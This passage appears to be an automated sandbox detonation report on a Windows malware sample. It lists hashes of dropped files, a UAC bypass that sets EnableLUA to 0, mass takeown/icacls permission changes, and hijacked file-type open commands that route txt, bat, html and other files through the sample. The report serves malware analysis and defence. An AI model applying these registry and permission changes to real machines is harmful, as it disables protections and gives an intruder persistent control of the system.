SHA512 a9d3fd8d5f901b5c00130baab0d3bc99bd41ee2241d34a395cba00c1f1854972eeb406053a30fa6b74d56816f954ca241e96928029c737fc2edffeac4dac1168

C:\Windows\System32\tzsync.exe

MD5 723659186ab13cd1077170ae7cdb2750
SHA1 df6d8195cdf873a9e0ff644a5875446f24b310e7
SHA256 6abf71dca4d8dcb39783936b5471461564bb3c2bd85212bb6ed29aba7f93f046
SHA512 7baa0c0a93ba11b3c765cf8847cc7fd6ccf94b7d252cf307376dbb6615058ce444d8e6dad2e878a0025140e74035a1e27782f5df3da2d7d63a1cacbb7715b03e

C:\Windows\System32\tzsync.exe

MD5 15ef8fb25bc7248af9429a31b11ca47a
SHA1 b5d52f363c40244e27f94ed431be85f782c654f5
SHA256 03e78bef19c8166d92028fc5b3f6e202fb1006bbdb03afce022783a2b4658b4f
SHA512 4d7a1c3ff1d86059de25faa4a975d9e3424512637a7aead82c6f8cf607c6eac383ef44bfdf8c1c6c4a1b1e5633c9b5755ff30794a06250587f3c507eaf6efe4a

C:\Windows\System32\tzsync.exe

MD5 caff06665b414ffbec6cb1c17b0376e8
SHA1 ed00ecb925a3c78598f6880bbf8624d95abac792
SHA256 2fe3324d358a4fd8d9f324f8783c3291390edbdd1e651ecfe193ea86880b6dba
SHA512 91b0e7451e27c649daaa0b8d20c462446266cb64a1fe5b72b674458deef0cc703f5a39aeb9bacaf86b419e82075fc7189728b96da71b94616635994ac71e0d38

C:\Windows\System32\tzsync.exe

MD5 9b7cdd763326d50a7e953618b26855d0
SHA1 c8461889c94d549e1d8e24344e7a4da60d1329bc
SHA256 ad3af7dbdefa2f26f046bfd189bf901b84f5a01fe5d097d93beb2cf5504e8e4b
SHA512 81bdea7f5b5cfc7d666fa8ff5daccfb0388649374c834aba109ec79b713192b07f71012b73c1fcf1026e63405cff791a6cd3b57a4baa68ff2b18c662daaa6c74

C:\Windows\System32\tzsync.exe

MD5 e3e47df11088c6c8aeefe4068a223354
SHA1 3b373646383b2285c0f9231c266c8838f8bf0187
SHA256 f252ce980d3c2b54d85642c46acbff84840ec1ec4408c94dedba3d14ddfcc468
SHA512 857ed92c7be29c695f5234f082cde15b1e8c7b2dafabc24230fdc7bc38955d152b66457bec7b1d71d4745fc72bb4990c1182b8884d68d022bcb41873865317ee

C:\Windows\System32\tzsync.exe

MD5 5253dbbbf09b786168572ce8f816848e
SHA1 bd0ccdbc47c2a51f180f822fe3c45f32e3f5da99
SHA256 718015309d982539d1dff52bd0c579f7810095b3dbce7110b73170d21e37cc92
SHA512 305fb7e9f0e411c3f45527413c30c43f7367da1f151ece043df4c7a955610f9e631fc465e3818b153dc0a4204716326aa76383244e8d7ba3b117990d5c31a2a6

C:\Windows\System32\tzsync.exe

MD5 33b6f7e3802c499a666ec7aa1438e9de
SHA1 7736e7c82d1712ea91099303e1cd9a3557b34940
SHA256 9a829010c4edb27cf04060befbb2d09e2fb299b4233a401879801d05b364fd1b
SHA512 e5c64a36dadfe8398f27dfccabcadbda7f99607702fefdbd7b2f9ea4d5e809387e36621cc6579e02ca329e18d29fd88a4bec21ad04fa12a7c007f53a778c4bbc

C:\Windows\System32\tzsync.exe

MD5 e6549419e3106e4712fcbce8b9a77def
SHA1 b52cde158fd7e09d103585772e3607dc3de28d5d
SHA256 cad5e8f95a73908015800788aa38e38780bb8b231b19b6e475e488f64f4905b5
SHA512 3fb29f6c098b1264ecf81f715bc13f31cdc73efc62ebd134e7d831efe478a60dacc1c2a79176264b95807d3b85dfe99d66d00e8222756bc9485a63b4a64bbc89

C:\Windows\System32\tzsync.exe

MD5 b887f25e5ef5f19e3eaded20739ba5a6
SHA1 908253ef2b0e7c5e1a1bf4b69ffedaee04c45556
SHA256 27ff69ad95f381790c11bccfa14889bbdcf409ec2f1548d5192e152f40f065de
SHA512 db31878944fd416186ca8bbbec33a64a04007703d308213e84399c2662b34b1571b4c7ce55a0cab25fa776b6783bbcf6fb1a204eb6dc68234350163645cfc416

C:\Windows\System32\tzsync.exe

MD5 84b602f461bed41c12f237aabfca17e2
SHA1 dec2ad048a73ae97686a75538a17ffa5d045453c
SHA256 b1378a409965f5408a9ef3cf330ff1a60edd6af55457a0c577aeb6689bd2c297
SHA512 0650e273bc0b70b809c63f153becb0be5a3416fd68be59d7d0122df005147ee2406103fd663247f856c45e10563bf30474c0589795339b07f8611afc3571e9ff

C:\Windows\System32\tzsync.exe

MD5 1a75cca69eb8800696c4bfda46465458
SHA1 445ba9908fc072fda2a63acbe71b227231325983
SHA256 9acaf5ab49b812412f35618f2257e44b0779451afbb593fa7889773d052e4928
SHA512 c8e8d2f574c152978c72bd53b081001f14636a6779b47ad583f89ffaf9c3e60b432091b55c7c80f278adb01f086935d191d764927f86732b4e40d2753e75ba15

memory/2060-11530-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-02 23:56

Reported

2024-10-02 23:59

Platform

win10v2004-20240802-en

Max time kernel

150s

Max time network

95s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\wowreg32.exe C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe HTMWF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe RTFDF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe CMDSF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe VBSSF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4432 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\reg.exe
PID 4432 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\reg.exe
PID 4432 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\reg.exe
PID 4432 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\reg.exe
PID 4432 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3420 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3420 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
